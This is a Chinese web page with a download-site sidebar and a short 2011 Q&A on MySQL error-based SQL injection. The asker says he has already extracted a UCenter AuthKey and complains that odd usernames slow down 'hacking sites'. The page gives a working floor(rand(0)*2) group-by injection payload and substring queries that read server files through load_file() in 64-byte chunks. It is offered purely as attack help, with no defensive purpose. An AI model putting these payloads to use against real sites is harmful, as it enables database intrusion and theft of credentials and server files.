- 1. DVDFab Passkey(轻松解决DVD受限制问题) V8.0.3.0 ...
- 2. UUSee网络电视去广告补丁(修正不能显示播放列表问题...
- 3. MySQL(for Windows 32Bit)官方最新下载 V5.5.13
- 4. MySQL(for Windows 64Bit)最新官方下载 V5.5.13
- 5. UScreen(解决WIN7下游戏黑边问题) V1.0.0.0
- 6. 迅游版迅雷网游加速器(解决网游中延时高、登录难、...
- 7. phpMyAdmin(通过互联网控制操作MYSQL的软件) V3.4....
- 8. Access与MYSQL互转 Access2MSSQL PRO v3.0.0 英文绿...
- 9. phpMyAdmin 3.4.0 RC2 多语绿色版_很方便的网络远M...
- 10. 旺财(有效解决开店货源问题) V 1.31 简体中文免费...
关于Mysql报错注入的几个问题
作者: 来源: 发布时间:2011-5-24 18:12:57 点击:
No.1:Mysql报错注入最多能够显示多少字节呢?我Inject到的UC的AuthKey爆出62位一共应该64位
No.2:爆出的用户名中文和特殊符号显示乱码,用Hex()转换了下爆出来再转回去的时候依然乱码,怎么解决?你知道国内很多SB爱用各种怪异的符号做用户名,严重影响日站的进度。。
No.3:能否用报错注入Load_File(),我没有成功语句如下:
and (select 1 from(select count(*),concat((select (select load_file(0x.........)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
1. 64 位,但是许多报错注入都会在前后加上特别符号,以方便分辨,如[],就变成62位了,可以使用substring来处理
2. 如图:
3. 同样使用substring 以64为1单位慢慢读, 最好就是写个循环来读
Select concat(substring(load_file(0x....),1,64)) FROM uc_applications limit 0,1
Select concat(substring(load_file(0x....),65,64)) FROM uc_applications limit 0,1
Select concat(substring(load_file(0x....),129,64)) FROM uc_applications limit 0,1
上一篇:MySQL创建用户及授权的简单方法 下一篇: 教你解决关于XP共享拒绝访问的问题
[收藏此文章]
